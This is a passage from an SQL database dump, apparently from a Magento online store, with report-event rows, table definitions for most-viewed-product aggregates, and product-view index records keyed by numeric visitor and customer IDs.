(29967, '2026-05-07 21:56:32', 1, 2059, 0, 1, 1),
(29968, '2026-05-07 21:56:32', 1, 2061, 0, 1, 1),
(29969, '2026-05-07 21:56:33', 1, 2064, 0, 1, 1),
(29970, '2026-05-07 21:56:34', 1, 2064, 0, 1, 1),
(29971, '2026-05-07 21:56:34', 1, 2060, 0, 1, 1),
(29972, '2026-05-07 21:56:34', 1, 2063, 0, 1, 1),
(29973, '2026-05-07 21:56:36', 1, 2062, 0, 1, 1),
(29974, '2026-05-07 21:56:36', 1, 2055, 0, 1, 1),
(29975, '2026-05-07 21:56:37', 1, 2064, 0, 1, 1),
(29976, '2026-05-07 21:56:39', 1, 2058, 0, 1, 1),
(29977, '2026-05-07 21:56:40', 1, 2059, 0, 1, 1),
(29978, '2026-05-07 21:56:40', 1, 2061, 0, 1, 1),
(29979, '2026-05-07 21:56:42', 1, 2064, 0, 1, 1),
(29980, '2026-05-07 21:56:42', 1, 2054, 0, 1, 1),
(29981, '2026-05-07 21:56:42', 1, 2064, 0, 1, 1),
(29982, '2026-05-07 21:56:43', 1, 2060, 0, 1, 1),
(29983, '2026-05-07 21:56:44', 1, 2063, 0, 1, 1),
(29984, '2026-05-07 21:56:45', 1, 2062, 0, 1, 1),
(29985, '2026-05-07 21:56:46', 1, 2055, 0, 1, 1),
(29986, '2026-05-07 21:56:46', 1, 2064, 0, 1, 1),
(29987, '2026-05-07 21:56:46', 1, 2064, 0, 1, 1),
(29988, '2026-05-07 21:56:47', 1, 2064, 0, 1, 1),
(29989, '2026-05-07 21:56:47', 1, 2062, 0, 1, 1),
(29990, '2026-05-07 21:56:47', 1, 2060, 0, 1, 1),
(29991, '2026-05-07 21:56:49', 1, 2063, 0, 1, 1),
(29992, '2026-05-07 21:56:55', 1, 2054, 0, 1, 1),
(29993, '2026-05-07 21:56:56', 1, 2064, 0, 1, 1),
(29994, '2026-05-07 21:56:57', 1, 2062, 0, 1, 1),
(29995, '2026-05-07 21:56:59', 1, 2054, 0, 1, 1),
(29996, '2026-05-07 21:57:04', 1, 2054, 0, 1, 1),
(29997, '2026-05-07 21:58:48', 1, 2061, 0, 1, 1),
(29998, '2026-05-07 22:59:09', 1, 2060, 0, 1, 1),
(29999, '2026-05-07 22:59:12', 1, 2060, 0, 1, 1),
(30000, '2026-05-08 00:42:58', 1, 2061, 0, 1, 1),
(30001, '2026-05-08 02:02:20', 1, 2058, 0, 1, 1),
(30002, '2026-05-08 07:48:18', 1, 2060, 0, 1, 1),
(30003, '2026-05-08 07:59:16', 4, 2062, 0, 1, 1),
(30004, '2026-05-08 08:43:01', 1, 2063, 0, 1, 1),
(30005, '2026-05-08 09:22:13', 1, 2061, 0, 1, 1),
(30006, '2026-05-08 11:42:50', 1, 2054, 0, 1, 1),
(30007, '2026-05-08 12:12:42', 1, 2055, 0, 1, 1),
(30008, '2026-05-08 12:25:22', 1, 2060, 0, 1, 1),
(30009, '2026-05-08 12:25:24', 1, 2064, 0, 1, 1),
(30010, '2026-05-08 12:25:26', 1, 2063, 0, 1, 1),
(30011, '2026-05-08 12:25:28', 1, 2058, 0, 1, 1),
(30012, '2026-05-08 12:25:30', 1, 2061, 0, 1, 1),
(30013, '2026-05-08 12:25:31', 1, 2059, 0, 1, 1),
(30014, '2026-05-08 12:25:34', 1, 2062, 0, 1, 1),
(30015, '2026-05-08 12:25:36', 1, 2054, 0, 1, 1),
(30016, '2026-05-08 12:25:39', 1, 2055, 0, 1, 1),
(30017, '2026-05-08 12:25:55', 1, 2053, 0, 1, 1),
(30018, '2026-05-08 12:46:41', 1, 2064, 0, 1, 1),
(30019, '2026-05-08 13:19:21', 1, 2054, 0, 1, 1),
(30020, '2026-05-08 14:03:37', 1, 2055, 0, 1, 1),
(30021, '2026-05-08 14:27:28', 1, 2064, 0, 1, 1),
(30022, '2026-05-08 14:30:55', 1, 2060, 0, 1, 1),
(30023, '2026-05-08 15:03:42', 1, 2054, 0, 1, 1),
(30024, '2026-05-08 15:32:37', 1, 2062, 0, 1, 1),
(30025, '2026-05-08 15:50:20', 1, 2062, 0, 1, 1),
(30026, '2026-05-08 15:54:39', 1, 2062, 0, 1, 1),
(30027, '2026-05-08 16:23:33', 1, 2062, 0, 1, 1),
(30028, '2026-05-08 16:24:05', 1, 2062, 0, 1, 1),
(30029, '2026-05-08 17:23:24', 1, 2060, 0, 1, 1),
(30030, '2026-05-08 18:36:11', 1, 2055, 0, 1, 1),
(30031, '2026-05-08 22:08:47', 1, 2054, 0, 1, 1),
(30032, '2026-05-08 22:15:56', 1, 2064, 0, 1, 1),
(30033, '2026-05-08 22:42:56', 1, 2064, 0, 1, 1),
(30034, '2026-05-08 23:29:05', 1, 2062, 0, 1, 1),
(30035, '2026-05-08 23:34:40', 1, 2061, 0, 1, 1),
(30036, '2026-05-08 23:47:56', 4, 2062, 0, 1, 1),
(30037, '2026-05-09 01:31:21', 1, 2061, 0, 1, 1),
(30038, '2026-05-09 01:37:35', 1, 2053, 0, 1, 1),
(30039, '2026-05-09 02:01:56', 1, 2060, 0, 1, 1),
(30040, '2026-05-09 02:09:29', 1, 2060, 0, 1, 1),
(30041, '2026-05-09 02:10:54', 1, 2053, 0, 1, 1),
(30042, '2026-05-09 02:27:19', 1, 2053, 0, 1, 1),
(30043, '2026-05-09 02:48:21', 1, 2059, 0, 1, 1),
(30044, '2026-05-09 02:48:27', 4, 2059, 9833, 1, 1),
(30045, '2026-05-09 02:49:49', 1, 2063, 0, 1, 1),
(30046, '2026-05-09 02:50:52', 1, 2053, 0, 1, 1),
(30047, '2026-05-09 02:56:29', 1, 2061, 0, 1, 1),
(30048, '2026-05-09 03:01:53', 1, 2059, 0, 1, 1),
(30049, '2026-05-09 03:03:54', 1, 2060, 0, 1, 1),
(30050, '2026-05-09 03:08:43', 1, 2058, 0, 1, 1),
(30051, '2026-05-09 03:14:48', 1, 2055, 0, 1, 1),
(30052, '2026-05-09 03:21:31', 1, 2054, 0, 1, 1),
(30053, '2026-05-09 03:28:23', 1, 2060, 0, 1, 1),
(30054, '2026-05-09 03:41:23', 1, 2063, 0, 1, 1),
(30055, '2026-05-09 04:00:34', 1, 2059, 0, 1, 1),
(30056, '2026-05-09 05:31:46', 1, 2053, 0, 1, 1),
(30057, '2026-05-09 07:17:56', 1, 2059, 0, 1, 1),
(30058, '2026-05-09 07:20:33', 1, 2060, 0, 1, 1),
(30059, '2026-05-09 07:57:27', 1, 2059, 0, 1, 1),
(30060, '2026-05-09 09:04:07', 1, 2053, 0, 1, 1),
(30061, '2026-05-09 09:04:14', 1, 2058, 0, 1, 1),
(30062, '2026-05-09 10:23:39', 1, 2063, 0, 1, 1),
(30063, '2026-05-09 10:23:44', 1, 2062, 0, 1, 1),
(30064, '2026-05-09 10:24:46', 1, 2061, 0, 1, 1),
(30065, '2026-05-09 10:50:47', 1, 2060, 0, 1, 1),
(30066, '2026-05-09 13:37:13', 1, 2054, 0, 1, 1),
(30067, '2026-05-09 13:40:57', 1, 2063, 0, 1, 1),
(30068, '2026-05-09 14:47:23', 1, 2062, 0, 1, 1),
(30069, '2026-05-09 15:36:36', 4, 2062, 0, 1, 1),
(30070, '2026-05-09 15:59:52', 1, 2062, 0, 1, 1),
(30071, '2026-05-09 16:00:45', 1, 2062, 0, 1, 1),
(30072, '2026-05-09 18:57:11', 1, 2055, 0, 1, 1),
(30073, '2026-05-09 19:36:27', 1, 2053, 0, 1, 1),
(30074, '2026-05-09 22:36:43', 1, 2061, 0, 1, 1),
(30075, '2026-05-09 22:58:18', 1, 2062, 0, 1, 1),
(30076, '2026-05-09 22:58:23', 1, 2061, 0, 1, 1),
(30077, '2026-05-09 22:58:26', 1, 2063, 0, 1, 1),
(30078, '2026-05-09 23:02:38', 1, 2060, 0, 1, 1),
(30079, '2026-05-09 23:02:41', 1, 2064, 0, 1, 1),
(30080, '2026-05-09 23:38:26', 1, 2058, 0, 1, 1),
(30081, '2026-05-10 00:29:36', 1, 2061, 0, 1, 1),
(30082, '2026-05-10 01:11:01', 1, 2059, 0, 1, 1),
(30083, '2026-05-10 02:13:19', 1, 2055, 0, 1, 1),
(30084, '2026-05-10 03:02:34', 1, 2062, 0, 1, 1),
(30085, '2026-05-10 03:05:08', 1, 2060, 0, 1, 1),
(30086, '2026-05-10 03:28:38', 1, 2058, 0, 1, 1),
(30087, '2026-05-10 04:25:48', 1, 2060, 0, 1, 1),
(30088, '2026-05-10 04:25:50', 1, 2060, 0, 1, 1),
(30089, '2026-05-10 06:19:38', 1, 2060, 0, 1, 1),
(30090, '2026-05-10 06:19:42', 1, 2060, 0, 1, 1),
(30091, '2026-05-10 07:43:10', 4, 2062, 0, 1, 1),
(30092, '2026-05-10 08:59:44', 1, 2060, 0, 1, 1),
(30093, '2026-05-10 09:26:15', 4, 2059, 0, 1, 1),
(30094, '2026-05-10 09:26:54', 4, 2062, 0, 1, 1),
(30095, '2026-05-10 09:26:58', 4, 2054, 0, 1, 1),
(30096, '2026-05-10 09:45:54', 1, 2064, 0, 1, 1),
(30097, '2026-05-10 11:00:38', 1, 2060, 0, 1, 1),
(30098, '2026-05-10 11:03:11', 1, 2062, 0, 1, 1),
(30099, '2026-05-10 11:56:56', 1, 2060, 0, 1, 1),
(30100, '2026-05-10 13:32:14', 1, 2053, 0, 1, 1),
(30101, '2026-05-10 16:16:07', 1, 2062, 0, 1, 1),
(30102, '2026-05-10 16:16:29', 1, 2062, 0, 1, 1),
(30103, '2026-05-10 18:44:38', 1, 2062, 0, 1, 1),
(30104, '2026-05-10 18:45:41', 1, 2064, 0, 1, 1),
(30105, '2026-05-10 21:21:39', 1, 2064, 0, 1, 1),
(30106, '2026-05-10 21:47:26', 1, 2054, 0, 1, 1),
(30107, '2026-05-10 21:47:41', 1, 2063, 0, 1, 1),
(30108, '2026-05-10 22:19:16', 1, 2060, 0, 1, 1),
(30109, '2026-05-10 22:44:03', 1, 2061, 0, 1, 1),
(30110, '2026-05-10 23:44:14', 4, 2062, 0, 1, 1),
(30111, '2026-05-11 04:14:27', 1, 2064, 0, 1, 1),
(30112, '2026-05-11 05:29:54', 1, 2059, 0, 1, 1),
(30113, '2026-05-11 05:30:28', 1, 2059, 0, 1, 1),
(30114, '2026-05-11 05:30:35', 1, 2059, 0, 1, 1),
(30115, '2026-05-11 06:25:59', 1, 2060, 0, 1, 1),
(30116, '2026-05-11 07:18:54', 1, 2061, 0, 1, 1),
(30117, '2026-05-11 07:19:08', 1, 2064, 0, 1, 1),
(30118, '2026-05-11 09:40:53', 1, 2059, 0, 1, 1),
(30119, '2026-05-11 09:48:31', 1, 2059, 0, 1, 1),
(30120, '2026-05-11 10:03:10', 1, 2061, 0, 1, 1),
(30121, '2026-05-11 10:54:39', 1, 2055, 0, 1, 1),
(30122, '2026-05-11 11:26:38', 1, 2062, 0, 1, 1),
(30123, '2026-05-11 11:55:50', 1, 2062, 0, 1, 1),
(30124, '2026-05-11 12:02:20', 1, 2058, 0, 1, 1),
(30125, '2026-05-11 13:10:51', 1, 2064, 0, 1, 1),
(30126, '2026-05-11 15:12:33', 1, 2058, 0, 1, 1),
(30127, '2026-05-11 15:22:50', 1, 2062, 0, 1, 1),
(30128, '2026-05-11 15:23:21', 1, 2062, 0, 1, 1),
(30129, '2026-05-11 15:34:58', 1, 2058, 0, 1, 1),
(30130, '2026-05-11 15:38:35', 4, 2062, 0, 1, 1),
(30131, '2026-05-11 17:29:13', 1, 2061, 0, 1, 1),
(30132, '2026-05-11 18:24:45', 1, 2060, 0, 1, 1),
(30133, '2026-05-11 19:01:10', 1, 2064, 0, 1, 1),
(30134, '2026-05-11 19:01:12', 1, 2061, 0, 1, 1),
(30135, '2026-05-11 19:01:13', 1, 2063, 0, 1, 1),
(30136, '2026-05-11 19:01:14', 1, 2062, 0, 1, 1),
(30137, '2026-05-11 19:01:15', 1, 2055, 0, 1, 1),
(30138, '2026-05-11 19:01:16', 1, 2058, 0, 1, 1),
(30139, '2026-05-11 19:01:18', 1, 2064, 0, 1, 1),
(30140, '2026-05-11 19:01:19', 1, 2059, 0, 1, 1),
(30141, '2026-05-11 19:01:20', 1, 2063, 0, 1, 1),
(30142, '2026-05-11 19:01:22', 1, 2063, 0, 1, 1),
(30143, '2026-05-11 19:01:23', 1, 2058, 0, 1, 1),
(30144, '2026-05-11 19:01:23', 1, 2059, 0, 1, 1),
(30145, '2026-05-11 19:01:24', 1, 2061, 0, 1, 1),
(30146, '2026-05-11 19:01:26', 1, 2064, 0, 1, 1),
(30147, '2026-05-11 19:01:27', 1, 2058, 0, 1, 1),
(30148, '2026-05-11 19:01:29', 1, 2062, 0, 1, 1),
(30149, '2026-05-11 19:01:29', 1, 2055, 0, 1, 1),
(30150, '2026-05-11 19:01:31', 1, 2060, 0, 1, 1),
(30151, '2026-05-11 19:01:34', 1, 2060, 0, 1, 1),
(30152, '2026-05-11 19:01:35', 1, 2064, 0, 1, 1),
(30153, '2026-05-11 19:01:36', 1, 2059, 0, 1, 1),
(30154, '2026-05-11 19:01:37', 1, 2058, 0, 1, 1),
(30155, '2026-05-11 19:01:37', 1, 2054, 0, 1, 1),
(30156, '2026-05-11 19:01:39', 1, 2059, 0, 1, 1),
(30157, '2026-05-11 19:01:40', 1, 2064, 0, 1, 1),
(30158, '2026-05-11 19:01:41', 1, 2054, 0, 1, 1),
(30159, '2026-05-11 19:01:42', 1, 2061, 0, 1, 1),
(30160, '2026-05-11 19:01:43', 1, 2064, 0, 1, 1),
(30161, '2026-05-11 19:01:44', 1, 2061, 0, 1, 1),
(30162, '2026-05-11 19:01:45', 1, 2062, 0, 1, 1),
(30163, '2026-05-11 19:01:46', 1, 2061, 0, 1, 1),
(30164, '2026-05-11 19:01:47', 1, 2063, 0, 1, 1),
(30165, '2026-05-11 19:01:48', 1, 2062, 0, 1, 1),
(30166, '2026-05-11 19:01:49', 1, 2064, 0, 1, 1),
(30167, '2026-05-11 19:01:50', 1, 2061, 0, 1, 1),
(30168, '2026-05-11 19:27:53', 1, 2062, 0, 1, 1),
(30169, '2026-05-11 19:27:56', 1, 2062, 0, 1, 1),
(30170, '2026-05-11 20:08:27', 1, 2054, 0, 1, 1),
(30171, '2026-05-11 20:47:02', 1, 2063, 0, 1, 1),
(30172, '2026-05-11 23:55:25', 1, 2053, 0, 1, 1),
(30173, '2026-05-12 00:33:24', 1, 2060, 0, 1, 1),
(30174, '2026-05-12 01:50:12', 1, 2064, 0, 1, 1),
(30175, '2026-05-12 05:05:14', 1, 2063, 0, 1, 1),
(30176, '2026-05-12 07:26:25', 4, 2062, 0, 1, 1),
(30177, '2026-05-12 07:53:58', 1, 2061, 0, 1, 1),
(30178, '2026-05-12 08:05:06', 1, 2064, 0, 1, 1),
(30179, '2026-05-12 08:41:58', 1, 2061, 0, 1, 1),
(30180, '2026-05-12 09:07:12', 1, 2053, 0, 1, 1),
(30181, '2026-05-12 09:32:34', 1, 2062, 0, 1, 1),
(30182, '2026-05-12 09:39:45', 1, 2059, 0, 1, 1),
(30183, '2026-05-12 09:40:02', 1, 2058, 0, 1, 1);

-- --------------------------------------------------------

--
-- Table structure for table `report_event_types`
--

CREATE TABLE `report_event_types` (
  `event_type_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Event Type ID',
  `event_name` varchar(64) NOT NULL COMMENT 'Event Name',
  `customer_login` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Customer Login'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Reports Event Type Table';

--
-- Dumping data for table `report_event_types`
--

INSERT INTO `report_event_types` (`event_type_id`, `event_name`, `customer_login`) VALUES
(1, 'catalog_product_view', 0),
(2, 'sendfriend_product', 0),
(3, 'catalog_product_compare_add_product', 0),
(4, 'checkout_cart_add_product', 0),
(5, 'wishlist_add_product', 0),
(6, 'wishlist_share', 0);

-- --------------------------------------------------------

--
-- Table structure for table `report_viewed_product_aggregated_daily`
--

CREATE TABLE `report_viewed_product_aggregated_daily` (
  `id` int(10) UNSIGNED NOT NULL COMMENT 'ID',
  `period` date DEFAULT NULL COMMENT 'Period',
  `store_id` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Store ID',
  `product_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'Product ID',
  `product_name` varchar(255) DEFAULT NULL COMMENT 'Product Name',
  `product_price` decimal(12,4) NOT NULL DEFAULT 0.0000 COMMENT 'Product Price',
  `views_num` int(11) NOT NULL DEFAULT 0 COMMENT 'Number of Views',
  `rating_pos` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Rating Pos'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Most Viewed Products Aggregated Daily';

-- --------------------------------------------------------

--
-- Table structure for table `report_viewed_product_aggregated_monthly`
--

CREATE TABLE `report_viewed_product_aggregated_monthly` (
  `id` int(10) UNSIGNED NOT NULL COMMENT 'ID',
  `period` date DEFAULT NULL COMMENT 'Period',
  `store_id` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Store ID',
  `product_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'Product ID',
  `product_name` varchar(255) DEFAULT NULL COMMENT 'Product Name',
  `product_price` decimal(12,4) NOT NULL DEFAULT 0.0000 COMMENT 'Product Price',
  `views_num` int(11) NOT NULL DEFAULT 0 COMMENT 'Number of Views',
  `rating_pos` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Rating Pos'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Most Viewed Products Aggregated Monthly';

-- --------------------------------------------------------

--
-- Table structure for table `report_viewed_product_aggregated_yearly`
--

CREATE TABLE `report_viewed_product_aggregated_yearly` (
  `id` int(10) UNSIGNED NOT NULL COMMENT 'ID',
  `period` date DEFAULT NULL COMMENT 'Period',
  `store_id` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Store ID',
  `product_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'Product ID',
  `product_name` varchar(255) DEFAULT NULL COMMENT 'Product Name',
  `product_price` decimal(12,4) NOT NULL DEFAULT 0.0000 COMMENT 'Product Price',
  `views_num` int(11) NOT NULL DEFAULT 0 COMMENT 'Number of Views',
  `rating_pos` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Rating Pos'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Most Viewed Products Aggregated Yearly';

-- --------------------------------------------------------

--
-- Table structure for table `report_viewed_product_index`
--

CREATE TABLE `report_viewed_product_index` (
  `index_id` bigint(20) UNSIGNED NOT NULL COMMENT 'Index ID',
  `visitor_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'Visitor ID',
  `customer_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'Customer ID',
  `product_id` int(10) UNSIGNED NOT NULL COMMENT 'Product ID',
  `store_id` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Store ID',
  `added_at` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Added At'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Reports Viewed Product Index Table';

--
-- Dumping data for table `report_viewed_product_index`
--

INSERT INTO `report_viewed_product_index` (`index_id`, `visitor_id`, `customer_id`, `product_id`, `store_id`, `added_at`) VALUES
(1, 46, 14, 2063, 1, '2021-06-09 06:36:52'),
(2, 47, NULL, 2064, 1, '2021-06-09 06:41:54'),
(3, 47, NULL, 2061, 1, '2021-06-09 06:41:56'),
(4, 47, NULL, 2058, 1, '2021-06-09 06:41:57'),
(5, 47, NULL, 2055, 1, '2021-06-09 06:41:59'),
(7, NULL, 14, 2064, 1, '2021-06-09 06:59:04'),
(10, NULL, 14, 2061, 1, '2021-06-09 07:08:07'),
(14, NULL, NULL, 2063, 1, '2021-06-09 07:38:02'),
(18, NULL, NULL, 2063, 1, '2021-06-09 08:39:00'),
(19, 50, NULL, 2063, 1, '2021-06-09 08:57:56'),
(21, NULL, NULL, 2054, 1, '2021-06-09 12:30:33'),
(22, NULL, NULL, 2055, 1, '2021-06-09 12:30:38'),
(23, NULL, NULL, 2064, 1, '2021-06-09 12:30:49'),
(24, NULL, NULL, 2063, 1, '2021-06-09 12:30:53'),
(25, NULL, NULL, 2062, 1, '2021-06-09 12:30:56'),
(26, NULL, NULL, 2060, 1, '2021-06-09 12:30:59'),
(27, NULL, NULL, 2059, 1, '2021-06-09 12:31:03'),
(28, NULL, NULL, 2061, 1, '2021-06-09 12:31:06'),
(29, NULL, NULL, 2058, 1, '2021-06-09 12:31:09'),
(30, NULL, NULL, 2060, 1, '2021-06-09 21:32:09'),
(31, NULL, NULL, 2063, 1, '2021-06-09 21:32:15'),
(32, NULL, NULL, 2058, 1, '2021-06-09 21:32:27'),
(33, NULL, NULL, 2055, 1, '2021-06-09 21:32:41'),
(34, NULL, NULL, 2061, 1, '2021-06-09 21:33:01'),
(35, NULL, NULL, 2062, 1, '2021-06-09 21:33:12'),
(36, NULL, NULL, 2054, 1, '2021-06-09 21:33:35'),
(37, NULL, NULL, 2059, 1, '2021-06-09 21:33:39'),
(38, NULL, NULL, 2064, 1, '2021-06-09 21:33:44'),
(39, NULL, NULL, 2053, 1, '2021-06-09 23:07:09'),
(40, NULL, NULL, 2053, 1, '2021-06-11 10:14:00'),
(41, 54, NULL, 2064, 1, '2021-06-12 03:04:20'),
(45, NULL, NULL, 2060, 1, '2021-06-13 07:07:31'),
(46, NULL, NULL, 2063, 1, '2021-06-13 07:09:32'),
(47, NULL, NULL, 2058, 1, '2021-06-13 07:14:46'),
(48, NULL, NULL, 2055, 1, '2021-06-13 07:24:02'),
(49, NULL, NULL, 2061, 1, '2021-06-13 07:40:22'),
(50, NULL, NULL, 2062, 1, '2021-06-13 07:49:23'),
(51, NULL, NULL, 2054, 1, '2021-06-13 08:06:32'),
(52, NULL, NULL, 2059, 1, '2021-06-13 08:10:04'),
(53, NULL, NULL, 2064, 1, '2021-06-13 08:13:07'),
(54, NULL, NULL, 2054, 1, '2021-06-13 08:26:54'),
(55, NULL, NULL, 2064, 1, '2021-06-13 17:46:20'),
(56, NULL, NULL, 2055, 1, '2021-06-13 20:57:46'),
(57, NULL, NULL, 2063, 1, '2021-06-13 21:00:04'),
(58, NULL, NULL, 2062, 1, '2021-06-13 21:02:18'),
(59, NULL, NULL, 2060, 1, '2021-06-13 21:03:53'),
(60, NULL, NULL, 2059, 1, '2021-06-13 21:06:02'),
(61, NULL, NULL, 2061, 1, '2021-06-13 21:08:26'),
(62, NULL, NULL, 2058, 1, '2021-06-14 00:57:58'),
(63, NULL, NULL, 2060, 1, '2021-06-14 03:57:11'),
(64, NULL, NULL, 2063, 1, '2021-06-14 03:59:59'),
(65, NULL, NULL, 2058, 1, '2021-06-14 04:06:41'),
(66, NULL, NULL, 2055, 1, '2021-06-14 04:18:16'),
(67, NULL, NULL, 2061, 1, '2021-06-14 04:37:13'),
(68, NULL, NULL, 2062, 1, '2021-06-14 04:47:46'),
(69, NULL, NULL, 2054, 1, '2021-06-14 05:06:54'),
(70, NULL, NULL, 2059, 1, '2021-06-14 05:10:58'),
(71, NULL, NULL, 2064, 1, '2021-06-14 05:14:18'),
(72, NULL, NULL, 2055, 1, '2021-06-14 11:30:42'),
(73, NULL, NULL, 2063, 1, '2021-06-15 12:31:25'),
(74, NULL, NULL, 2061, 1, '2021-06-15 14:52:42'),
(75, NULL, NULL, 2058, 1, '2021-06-15 15:21:23'),
(76, 57, NULL, 2064, 1, '2021-06-15 15:49:41'),
(77, NULL, NULL, 2063, 1, '2021-06-15 16:34:43'),
(78, NULL, NULL, 2060, 1, '2021-06-15 16:40:48'),
(79, NULL, NULL, 2063, 1, '2021-06-15 16:42:38'),
(80, NULL, NULL, 2058, 1, '2021-06-15 16:47:13'),
(81, NULL, NULL, 2055, 1, '2021-06-15 16:56:05'),
(82, NULL, NULL, 2061, 1, '2021-06-15 17:11:32'),
(83, NULL, NULL, 2062, 1, '2021-06-15 17:20:03'),
(84, NULL, NULL, 2054, 1, '2021-06-15 17:36:09'),
(85, NULL, NULL, 2059, 1, '2021-06-15 17:39:27'),
(86, NULL, NULL, 2064, 1, '2021-06-15 17:42:17'),
(87, NULL, NULL, 2054, 1, '2021-06-16 00:56:05'),
(88, NULL, NULL, 2062, 1, '2021-06-16 02:47:44'),
(89, NULL, NULL, 2062, 1, '2021-06-16 06:45:18'),
(90, NULL, NULL, 2060, 1, '2021-06-16 11:25:18'),
(91, 61, 6, 2062, 1, '2021-06-16 12:03:32'),
(95, NULL, NULL, 2064, 1, '2021-06-16 19:14:21'),
(96, NULL, NULL, 2059, 1, '2021-06-16 19:17:01'),
(97, NULL, NULL, 2060, 1, '2021-06-17 14:55:04'),
(98, NULL, NULL, 2063, 1, '2021-06-17 14:57:00'),
(99, NULL, NULL, 2058, 1, '2021-06-17 15:02:35'),
(100, NULL, NULL, 2055, 1, '2021-06-17 15:12:28'),
(101, NULL, NULL, 2061, 1, '2021-06-17 15:27:45'),
(102, NULL, NULL, 2062, 1, '2021-06-17 15:36:05'),
(103, NULL, NULL, 2054, 1, '2021-06-17 15:51:52'),
(104, NULL, NULL, 2059, 1, '2021-06-17 15:55:21'),
(105, NULL, NULL, 2060, 1, '2021-06-17 16:09:08'),
(106, NULL, NULL, 2063, 1, '2021-06-17 16:10:52'),
(107, NULL, NULL, 2058, 1, '2021-06-17 16:15:47'),
(108, NULL, NULL, 2055, 1, '2021-06-17 16:24:30'),
(109, NULL, NULL, 2061, 1, '2021-06-17 16:38:34'),
(110, NULL, NULL, 2062, 1, '2021-06-17 16:46:18'),
(111, NULL, NULL, 2054, 1, '2021-06-17 17:01:08'),
(112, NULL, NULL, 2059, 1, '2021-06-17 17:04:26'),
(113, NULL, NULL, 2064, 1, '2021-06-17 17:07:05'),
(114, NULL, NULL, 2060, 1, '2021-06-18 09:39:33'),
(115, NULL, NULL, 2060, 1, '2021-06-18 13:12:01'),
(116, NULL, NULL, 2063, 1, '2021-06-18 13:14:00'),
(117, NULL, NULL, 2058, 1, '2021-06-18 13:19:33'),
(118, NULL, NULL, 2055, 1, '2021-06-18 13:29:51'),
(119, NULL, NULL, 2061, 1, '2021-06-18 13:46:44'),
(120, NULL, NULL, 2062, 1, '2021-06-18 13:55:38'),
(121, NULL, NULL, 2054, 1, '2021-06-18 14:12:31'),
(122, NULL, NULL, 2059, 1, '2021-06-18 14:16:03'),
(123, NULL, NULL, 2064, 1, '2021-06-18 14:18:59'),
(124, NULL, NULL, 2060, 1, '2021-06-18 14:35:27'),
(125, NULL, NULL, 2060, 1, '2021-06-18 16:09:12'),
(126, NULL, NULL, 2063, 1, '2021-06-18 16:11:03'),
(127, NULL, NULL, 2058, 1, '2021-06-18 16:15:58'),
(128, NULL, NULL, 2055, 1, '2021-06-18 16:24:31'),
(129, NULL, NULL, 2061, 1, '2021-06-18 16:39:04'),
(130, NULL, NULL, 2062, 1, '2021-06-18 16:46:55'),
(131, NULL, NULL, 2054, 1, '2021-06-18 17:02:01'),
(132, NULL, NULL, 2059, 1, '2021-06-18 17:05:16'),
(133, NULL, NULL, 2064, 1, '2021-06-18 17:08:01'),
(134, NULL, NULL, 2060, 1, '2021-06-18 20:56:02'),
(135, NULL, NULL, 2063, 1, '2021-06-18 20:58:01'),
(136, NULL, NULL, 2058, 1, '2021-06-18 21:03:21'),
(137, NULL, NULL, 2055, 1, '2021-06-18 21:12:32'),
(138, NULL, NULL, 2061, 1, '2021-06-18 21:27:57'),
(139, NULL, NULL, 2062, 1, '2021-06-18 21:35:45'),
(140, NULL, NULL, 2054, 1, '2021-06-18 21:50:56'),
(141, NULL, NULL, 2059, 1, '2021-06-18 21:54:17'),
(142, NULL, NULL, 2064, 1, '2021-06-18 21:56:58'),
(143, NULL, NULL, 2060, 1, '2021-06-19 16:58:48'),
(144, NULL, NULL, 2063, 1, '2021-06-19 17:00:33'),
(145, NULL, NULL, 2058, 1, '2021-06-19 17:04:55'),
(146, NULL, NULL, 2055, 1, '2021-06-19 17:13:02'),
(147, NULL, NULL, 2061, 1, '2021-06-19 17:26:07'),
(148, NULL, NULL, 2062, 1, '2021-06-19 17:32:44'),
(149, NULL, NULL, 2054, 1, '2021-06-19 17:45:20'),
(150, NULL, NULL, 2059, 1, '2021-06-19 17:48:03'),
(151, NULL, NULL, 2064, 1, '2021-06-19 17:50:20'),
(152, NULL, NULL, 2060, 1, '2021-06-20 12:47:20'),
(153, NULL, NULL, 2063, 1, '2021-06-20 12:49:37'),
(154, NULL, NULL, 2058, 1, '2021-06-20 12:54:56'),
(155, NULL, NULL, 2055, 1, '2021-06-20 13:04:23'),
(156, NULL, NULL, 2061, 1, '2021-06-20 13:19:39'),
(157, NULL, NULL, 2062, 1, '2021-06-20 13:27:35'),
(158, NULL, NULL, 2054, 1, '2021-06-20 13:43:02'),
(159, NULL, NULL, 2059, 1, '2021-06-20 13:46:36'),
(160, NULL, NULL, 2064, 1, '2021-06-20 13:49:25'),
(161, NULL, NULL, 2060, 1, '2021-06-20 16:40:01'),
(162, NULL, NULL, 2063, 1, '2021-06-20 16:41:59'),
(163, NULL, NULL, 2058, 1, '2021-06-20 16:47:05'),
(164, NULL, NULL, 2055, 1, '2021-06-20 16:55:55'),
(165, NULL, NULL, 2060, 1, '2021-06-20 18:07:31'),
(166, NULL, NULL, 2063, 1, '2021-06-20 18:09:25'),
(167, NULL, NULL, 2058, 1, '2021-06-20 18:14:21'),
(168, NULL, NULL, 2055, 1, '2021-06-20 18:23:56'),
(169, NULL, NULL, 2054, 1, '2021-06-20 18:37:29'),
(170, NULL, NULL, 2061, 1, '2021-06-20 18:39:04'),
(171, NULL, NULL, 2062, 1, '2021-06-20 18:46:44'),
